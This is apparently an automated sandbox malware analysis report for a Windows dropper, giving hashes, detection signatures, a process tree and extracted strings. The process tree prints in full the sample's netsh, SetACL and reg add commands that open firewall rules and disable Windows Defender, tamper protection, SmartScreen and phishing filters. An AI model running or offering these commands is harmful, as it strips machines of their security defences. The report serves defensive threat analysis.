Edit tour

Windows Analysis Report
4hIPvzV6a2.exe

Overview

General Information

Sample name:	4hIPvzV6a2.exe renamed because original name is a hash value
Original sample name:	99a7d3f6669bc38e1fe1ca11e9085516.exe
Analysis ID:	1515274
MD5:	99a7d3f6669bc38e1fe1ca11e9085516
SHA1:	a81034e3d7c91817f2864795f85e2c137f3afafb
SHA256:	0a982520cd694fa4eed2a58829908080c9b004df99f79af26a0e3a86fa7197f0
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Adds extensions / path to Windows Defender exclusion list (Registry)

Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Disables the Smart Screen filter

Disables the phising filter of Microsoft Edge

Machine Learning detection for dropped file

Modifies the windows firewall

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Windows Defender Exclusions Added - Registry

Too many similar processes found

Uses 32bit PE files

Uses reg.exe to modify the Windows registry

Classification

Process Tree

System is w10x64

4hIPvzV6a2.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\4hIPvzV6a2.exe" MD5: 99A7D3F6669BC38E1FE1CA11E9085516)

netsh.exe (PID: 6252 cmdline: netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 6128 cmdline: netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2816 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SetACL64.exe (PID: 2496 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 600 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 2336 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 6180 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 5800 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 3488 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 7088 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 2996 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

cmd.exe (PID: 6340 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2920 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2836 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 3120 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2596 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 1908 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 4996 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 1148 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 4428 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2336 cmdline: reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 1456 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 5576 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 3992 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 3488 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 6444 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 7088 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 5856 cmdline: reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2664 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2996 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 3864 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 3156 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2920 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 4856 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2496 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2596 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2008 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 1368 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 6916 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 6404 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 1456 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 4592 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 5576 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cleanup

Sigma Signatures

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6404, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\DisableAutoExclusions

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe	Virustotal: Detection: 28%			Perma Link

Multi AV Scanner detection for submitted file

Source: 4hIPvzV6a2.exe	ReversingLabs: Detection: 36%
Source: 4hIPvzV6a2.exe	Virustotal: Detection: 43%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe

Joe Sandbox ML: detected

Source: 4hIPvzV6a2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 4hIPvzV6a2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdbp( source: oofzzwcvgbcojt.exe.0.dr
Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.1712894791.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.1714763251.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.1714131650.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.1716174174.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.1715095177.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.1717428003.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.1716547782.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source:	Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: win_version_csharp.exe.0.dr
Source:	Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: oofzzwcvgbcojt.exe.0.dr
Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.1712894791.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.1714763251.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.1714131650.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.1716174174.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.1715095177.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.1717428003.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.1716547782.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions DisableAutoExclusions

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68687C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	7_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF6868496D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	7_2_00007FF6868496D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68685CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	7_2_00007FF68685CF15
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68687C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	11_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF6868496D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	11_2_00007FF6868496D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68685CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	11_2_00007FF68685CF15

Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 4hIPvzV6a2.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.wolfpackheights.click
Source: SetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	String found in binary or memory: https://helgeklein.com
Source: SetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	String found in binary or memory: https://helgeklein.com.
Source: SetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	String found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: PowerRun64.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

